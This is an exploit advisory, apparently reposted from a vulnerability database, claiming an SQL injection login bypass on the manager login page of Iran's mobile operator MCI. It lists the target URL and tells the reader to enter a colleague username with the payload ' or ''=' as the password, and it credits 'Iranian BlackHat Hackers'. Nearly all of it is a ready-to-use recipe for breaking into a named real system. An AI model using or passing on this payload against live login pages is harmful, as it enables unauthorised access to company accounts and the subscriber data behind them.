MCI Manager Login Authentication bypass vulnerability

2015.11.06
Credit: 4TT4CK3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Description: Mobile Telecommunication Company of Iran (MCI), a public company also known under its brand name Hamrah-e-Aval, is Iran's first and largest mobile phone network operator. MCI is a subsidiary of the Telecommunication Company of Iran and has over 18 million postpaid and over 20 million prepaid subscribers.

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit title : MCI Manager Login Authentication bypass vulnerability
~# : Exploit Author : 4TT4CK3R
~# : Vendor Homepage : https://mciX.ir
~# : Date : 2015/09/03
~# : Tested on : Kali Linux, Windows, Mozilla Firefox
~# : Google Dork : No
~# : Location : https://mci.ir/web/guest/login
~# : Instead of the password, use ' or ''='
~# : Username : Colleague Username
~# : Password : ' or ''='
~# : ScreenShot : http://i.imgur.com/ffRZCLE.png
~# : Discovered by : 4TT4CK3R
~# : Special thanks to : Iranian BlackHat Hackers
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://i.imgur.com/ffRZCLE.png


Copyright 2017, cxsecurity.com

 
